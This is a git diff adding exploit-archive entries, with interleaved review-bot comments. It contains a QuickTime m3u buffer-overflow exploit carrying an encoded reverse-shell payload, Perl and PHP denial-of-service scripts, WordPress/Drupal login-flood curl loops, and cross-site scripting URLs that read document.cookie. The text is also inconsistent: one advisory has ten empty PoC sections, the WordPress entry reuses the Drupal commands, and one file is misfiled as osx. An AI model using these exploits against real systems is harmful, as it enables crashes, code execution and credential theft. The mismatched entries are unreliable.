diff --git a/platforms/hardware/webapps/35422.txt b/platforms/hardware/webapps/35422.txt
new file mode 100755
index 000000000..59ea43301
--- /dev/null
+++ b/platforms/hardware/webapps/35422.txt
@@ -0,0 +1,314 @@
+?
+IPUX CS7522/CS2330/CS2030 IP Camera (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow
+
+
+Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
+Product web page: http://www.ipux.net | http://www.fitivision.com
+Affected version: PT Type ICS2330 (firmware: ICS2330 1.1.0-29 20140120 r4296)
+ Cube Type ICS2030 (firmware: ICS2030 1.1.0-21 20130223 r3967)
+ Dome Type ICS7522 (firmware: ICS7522 1.1.0-7 20120413 r3812)
+
+Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
+With high performance H.264 video compression, the file size of video stream is
+extremely reduced, as to optimize the network bandwidth efficiency. It has full
+Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
+built-in USB port provides a convenient and portable storage option for local storage
+of event and schedule recording, especially network disconnected.
+
+Desc: The UltraHVCam ActiveX Control 'UltraHVCamX.ocx' suffers from a stack buffer
+overflow vulnerability when parsing large amount of bytes to several functions in
+UltraHVCamLib, resulting in memory corruption overwriting several registers including
+the SEH. An attacker can gain access to the system of the affected node and execute
+arbitrary code.
+
+----------------------------------------------------------------------------------
+
+(4b24.478c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraHVCamX.ocx -
+eax=02d04d4f ebx=001dc890 ecx=41414141 edx=41414141 esi=001d6d6c edi=00000009
+eip=10032459 esp=0030efe8 ebp=0030efec iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+UltraHVCamX!DllUnregisterServer+0x100e9:
+10032459 8b12 mov edx,dword ptr [edx] ds:002b:41414141=????????
+0:000> d ecx
+41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+0:000> d eax
+02d04d4f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+02d04d5f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+02d04d6f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+02d04d7f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+02d04d8f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+02d04d9f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+02d04daf 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+02d04dbf 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+
+----------------------------------------------------------------------------------
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5212
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5212.php
+
+
+16.11.2014
+
+---
+
+
+Properties:
+-----------
+
+FileDescription UltraHVCam ActiveX Control
+FileVersion 1, 0, 52, 55 and 1, 0, 52, 54
+InternalName UltraHVCamX
+OriginalFileName UltraHVCamX.ocx
+ProductName UltraHVCam device ActiveX Control
+ProductVersion 1, 0, 52, 55 and 1, 0, 52, 54
+
+
+List of members:
+----------------
+
+Interface IUltraHVCamX : IDispatch
+Default Interface: True
+Members : 66
+ RemoteHost
+ RemotePort
+ AccountCode
+ GetConfigValue
+ SetConfigValue
+ SetCGIAPNAME
+ Password
+ UserName
+ fChgImageSize
+ ImgWidth
+ ImgHeight
+ SnapFileName
+ AVIRecStart
+ SetImgScale
+ OpenFolder
+ OpenFileDlg
+ TriggerStatus
+ AVIRecStatus
+ Event_Frame
+ PlayVideo
+ SetAutoScale
+ Event_Signal
+ WavPlay
+ CGI_ParamGet
+ CGI_ParamSet
+ MulticastEnable
+ MulticastStatus
+ SetPTUserAllow
+ SetLanguage
+ SetZoomButtonFontColor
+ SetZoomButtonColor
+ SetFullScreen
+
+
+Vulnerable members of the class:
+--------------------------------
+
+RemoteHost
+AccountCode
+SetCGIAPNAME
+Password
+UserName
+SnapFileName
+OpenFolder
+CGI_ParamGet
+CGI_ParamSet
+MulticastEnable
+
+
+PoC(s):
+-------
+
+
+---1
+
+
+
+
+
+
+
+
+---2
+
+
+
+
+
+
+
+
+---3
+
+
+
+
+
+
+
+
+---4
+
+
+
+
+
+
+
+
+---5
+
+
+
+
+
+
+
+
+---6
+
+
+
+
+
+
+
+
+---7
+
+
+
+
+
+
+
+
+---8
+
+
+
+
+
+
+
+
+---9
+
+
+
+
+
+
+
+
+---10
+
+
+
+
+
+
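Review bot: The `PoC(s):` section of 35422.txt is ten numbered headings (`---1` to `---10`) with nothing under them, and the file opens with a stray `?` line, so as shown here the text looks like it went through a lossy conversion before it was committed. The member list is inconsistent in the same way: the header says `Members : 66` but 32 names follow. The advisory also gives no CLSID for the control and no fixed firmware version, which are the two things someone triaging exposure needs in order to find and disable it. I would add an explicit line such as `Fix / mitigation: <not stated in the advisory>` so readers do not assume one exists.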
diff --git a/platforms/multiple/dos/35437.pl b/platforms/multiple/dos/35437.pl
new file mode 100755
index 000000000..14dd4c1d7
--- /dev/null
+++ b/platforms/multiple/dos/35437.pl
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/46827/info
+
+Air Contacts Lite is prone a denial-of-service vulnerability.
+
+Successful exploits may allow an attacker to crash the affected application, resulting in a denial-of-service condition.
+
+#!/usr/bin/perl
+use IO::Socket;
+ if (@ARGV < 1) {
+ usage();
+ }
+ $ip = $ARGV[0];
+ $port = $ARGV[1];
+ print "[+] Sending request...\n";
+ $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
+"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
+ print $socket "GET http://www.example.com. HTTP/1.1\r\n";
+ print $socket "Host: http://www.example.com.\r\n";
+ print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
+ sleep(2);
+ close($socket);
+ print "[+] Done!\n";
+
+sub usage() {
+ print "[-] example - Air Contacts Lite (DoS)\n\n";
+ print "[-] Usage: <". $0 ."> \n";
+ print "[-] Example: ". $0 ." 127.0.0.1 80\n";
+ exit;
+}
\ No newline at end of file
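Review bot: The first five lines of 35437.pl (`source:` and the two description sentences) sit above `#!/usr/bin/perl` as bare prose, so the header is not part of the script's comments and the shebang is not on line 1; 35433.pl in this commit has the same layout. The description also names neither an affected version nor what is unusual about the request. From the code, the request differs from a well-formed one in two places, the absolute URL in the `Host:` header and the `Content-Length` value `0\x78\x41\x71\x69` (the text `0xAqi`). I would turn the preamble into `#` comments below the shebang and add a line such as `# Malformed fields: Host carries a full URL; Content-Length is not a decimal integer. Affected version: <not stated>` so a reader can write an input-validation or detection rule from it.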
diff --git a/platforms/osx/remote/35433.pl b/platforms/osx/remote/35433.pl
new file mode 100755
index 000000000..84dd5c5e2
--- /dev/null
+++ b/platforms/osx/remote/35433.pl
@@ -0,0 +1,118 @@
+source: http://www.securityfocus.com/bid/46799/info
+
+Apple QuickTime is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
+
+QuickTime 7.5.x is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+
+###
+# Title : QuickTime Player v 7.5.x (m3u) Stack Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows
+# Impact : Remote Access and BOF
+# Tested on : Windows XP SP3 Français
+# Target : QuickTime Player v 7.5.x
+###
+# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";
+print " |===========================================================|\n";
+print " |= [!] Name : QuickTime Player v 7.5.x (m3u) / Apple Inc. =|\n";
+print " |= [!] Exploit : Stack Buffer Overflow =|\n";
+print " |= [!] Author : KedAns-Dz =|\n";
+print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
+print " |===========================================================|\n";
+sleep(2);
+print "\n";
+print " [!] Please Wait Loading...\n";
+# Payload Parameter (http://www.metasploit.com)
+# windows/shell_reverse_tcp - 739 bytes
+# Encoder: x86/alpha_mixed
+# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
+my $payload =
+"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
+"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
+"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
+"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
+"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
+"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
+"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
+"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
+"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
+"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
+"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
+"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
+"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
+"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
+"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
+"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
+"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
+"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
+"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
+"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
+"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
+"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
+"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
+"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
+"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
+"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
+"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
+"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
+"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
+"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
+"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
+"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
+"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
+"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
+"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
+"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
+"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
+"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
+"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
+"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
+"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
+"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
+"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
+"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
+"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
+"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
+"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
+"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
+"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
+"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
+"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
+"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
+"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41"; #_ End Payload _
+# Parameter OverFlow =>
+my $eip = pack('V',0x7C86467B); # Jump ESP from kernel32.dll
+my $usmh = "\x90" x (50 - length($eip)); # Pack Length x 50
+my $ret = pack('V',0x040904b0); # Jump to ESP from QTOControl.dll
+$junk = "\x41" x 333 ; # Junk
+# immiXing Parameters >>>
+$kedans = $junk.$usmh.$ret.$payload ; # Evil KedAns
+# >> Creating ...
+open (FILE ,"> Bo0M.m3u");
+print FILE $kedans ;
+print "\nFile successfully created!\n" or die print "\n OpsS! File is Not Created !! ";
+close (FILE);
+#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
+# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
+# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
+# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <
+# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
+# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
+# sec4ever.com members Dz : =>>
+# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
+# hotturks.org : TeX * KadaVra ... all Others
+# Kelvin.Xgr ( kelvinx.net)
+#===========================================================================
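Review bot: This file is added under `platforms/osx/remote/`, but its own header says `platform : Windows` and `Tested on : Windows XP SP3`, and the comments refer to kernel32.dll and QTOControl.dll, so the osx classification looks wrong and will mislead anyone filtering the archive by platform. The path, and the matching files.csv row (not visible in this part of the diff), should both read windows. Separately, `$payload` is an opaque byte blob that the comments describe as a Metasploit `windows/shell_reverse_tcp` payload for 127.0.0.1:4444, and nothing in the file lets a reader verify that. A caveat next to `my $payload`, such as `# payload bytes not verified by the archive; treat as untrusted and analyse only in an isolated lab`, would be appropriate.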
diff --git a/platforms/php/webapps/35413.php b/platforms/php/webapps/35413.php
new file mode 100755
index 000000000..74595ec5c
--- /dev/null
+++ b/platforms/php/webapps/35413.php
@@ -0,0 +1,67 @@
+ $argv[2],
+ 'pwd' => str_repeat("A",1000000),
+ 'redirect_to' => $argv[1] . "/wp-admin/",
+ 'reauth' => 1,
+ 'testcookie' => '1',
+ 'wp-submit' => "Log%20In");
+
+ $cookieFiles = "cookie.txt";
+
+ curl_setopt_array($ch, array(
+ CURLOPT_HEADER => 1,
+ CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
+ CURLOPT_REFERER => $argv[1] . "/wp-admin/",
+ CURLOPT_COOKIEJAR => $cookieFiles,
+ CURLOPT_COOKIESESSION => true,
+ CURLOPT_URL => $argv[1] . '/wp-login.php',
+ CURLOPT_RETURNTRANSFER => true,
+ CURLOPT_POST => true,
+ CURLOPT_POSTFIELDS => $postData,
+ CURLOPT_FOLLOWLOCATION => true));
+
+ curl_multi_add_handle($multi, $ch);
+
+ $channels[$x] = $ch;
+}
+
+$active = null;
+
+do {
+ $mrc = curl_multi_exec($multi, $active);
+} while ($mrc == CURLM_CALL_MULTI_PERFORM);
+
+while ($active && $mrc == CURLM_OK) {
+ do {
+
+ $mrc = curl_multi_exec($multi, $active);
+ } while ($mrc == CURLM_CALL_MULTI_PERFORM);
+}
+
+foreach ($channels as $channel) {
+ curl_multi_remove_handle($multi, $channel);
+}
+
+curl_multi_close($multi);
+echo ".";
+} while (1==1);
+
+?>
+
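Review bot: Nothing in the lines shown says which product or version this request targets or which release fixes it; the only hints are the `/wp-login.php` URL and the `pwd` field built with `str_repeat("A",1000000)`. The hunk header announces 67 lines while fewer appear here and the first visible line starts mid-array, so a header may have been lost in this rendering. If the file itself lacks one, a comment such as `// WordPress long-password login DoS; affected versions and fixed release: see 35414.txt` would tie it to the advisory added in the same commit (presumably the same issue; confirm). It would also help to state that the oversized `pwd` value is the distinguishing feature, since that is what a request-size limit on the login endpoint would key on.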
diff --git a/platforms/php/webapps/35414.txt b/platforms/php/webapps/35414.txt
new file mode 100755
index 000000000..928cd2753
--- /dev/null
+++ b/platforms/php/webapps/35414.txt
@@ -0,0 +1,51 @@
+====================================================================
+DESCRIPTION:
+====================================================================
+A vulnerability present in Wordpress < 4.0.1 allows an
+attacker to send specially crafted requests resulting in CPU and memory
+exhaustion. This may lead to the site becoming unavailable or
+unresponsive (denial of service).
+
+====================================================================
+Time Line:
+====================================================================
+
+November 20, 2014 - A Wordpress security update and the security
+advisory is published.
+
+====================================================================
+Proof of Concept:
+====================================================================
+Generate a pyaload and try with a valid user:
+
+echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
+{1..1000000} >> valid_user_payload && echo -n "&op=Log
+in&form_id=user_login" >> valid_user_payload
+
+Perform a Dos with a valid user:
+
+for i in `seq 1 150`; do (curl --data @valid_user_payload
+http://yoursite/wordpress/?q=user --silent > /dev/null &); sleep 0.5; done
+
+====================================================================
+Authors:
+====================================================================
+
+-- Javer Nieto -- http://www.behindthefirewalls.com
+-- Andres Rojas -- http://www.devconsole.info
+
+====================================================================
+References:
+====================================================================
+
+* https://wordpress.org/news/2014/11/wordpress-4-0-1/
+
+* https://www.drupal.org/SA-CORE-2014-006
+
+*
+http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
+
+*
+http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
+
+* http://www.devconsole.info/?p=1050
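Review bot: The `Proof of Concept` section of this WordPress advisory is the same text as in the Drupal advisory 35415.txt, with only the path changed to `/wordpress/`. The body still uses `name=`, `pass=` and `form_id=user_login` and is posted to `?q=user`, which are the Drupal login form fields, whereas 35413.php in this commit sends the WordPress request to `/wp-login.php` with a `pwd` field. As written, the section does not describe the WordPress issue and would mislead anyone deriving a detection rule or regression test from it. I would replace it with a pointer such as `See 35413.php for the WordPress request; the commands in 35415.txt apply to Drupal only`, and fix the `pyaload` typo, which also appears in 35415.txt.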
diff --git a/platforms/php/webapps/35415.txt b/platforms/php/webapps/35415.txt
new file mode 100755
index 000000000..18b051111
--- /dev/null
+++ b/platforms/php/webapps/35415.txt
@@ -0,0 +1,53 @@
+====================================================================
+DESCRIPTION:
+====================================================================
+A vulnerability present in Drupal < 7.34 allows an attacker to send
+specially crafted requests resulting in CPU and memory exhaustion. This
+may lead to the site becoming unavailable or unresponsive (denial of
+service).
+
+====================================================================
+Time Line:
+====================================================================
+
+November 19, 2014 - A Drupal security update and the security advisory
+is published.
+
+====================================================================
+Proof of Concept:
+====================================================================
+
+Generate a pyaload and try with a valid user:
+
+echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
+{1..1000000} >> valid_user_payload && echo -n "&op=Log
+in&form_id=user_login" >> valid_user_payload
+
+Perform a Dos with a valid user:
+
+for i in `seq 1 150`; do (curl --data @valid_user_payload
+http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done
+
+
+====================================================================
+Authors:
+====================================================================
+
+-- Javer Nieto -- http://www.behindthefirewalls.com
+-- Andres Rojas -- http://www.devconsole.info
+
+====================================================================
+References:
+====================================================================
+
+* https://wordpress.org/news/2014/11/wordpress-4-0-1/
+
+* https://www.drupal.org/SA-CORE-2014-006
+
+*
+http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
+
+*
+http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
+
+* http://www.devconsole.info/?p=1050
diff --git a/platforms/php/webapps/35416.txt b/platforms/php/webapps/35416.txt
new file mode 100755
index 000000000..68e082f24
--- /dev/null
+++ b/platforms/php/webapps/35416.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46771/info
+
+Interleave is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Interleave 5.5.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0
\ No newline at end of file
diff --git a/platforms/php/webapps/35435.txt b/platforms/php/webapps/35435.txt
new file mode 100755
index 000000000..97b2714bb
--- /dev/null
+++ b/platforms/php/webapps/35435.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46823/info
+
+The Lazyest Gallery WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Lazyest Gallery WordPress Plugin 1.0.26 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/lazyest-gallery/lazyest-popup.php?image=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35436.txt b/platforms/php/webapps/35436.txt
new file mode 100755
index 000000000..e96030124
--- /dev/null
+++ b/platforms/php/webapps/35436.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46825/info
+
+Xinha is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Xinha 0.96.1 is vulnerable; prior versions may also be affected. Note that applications that use vulnerable versions of Xinha may also be affected.
+
+http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E
\ No newline at end of file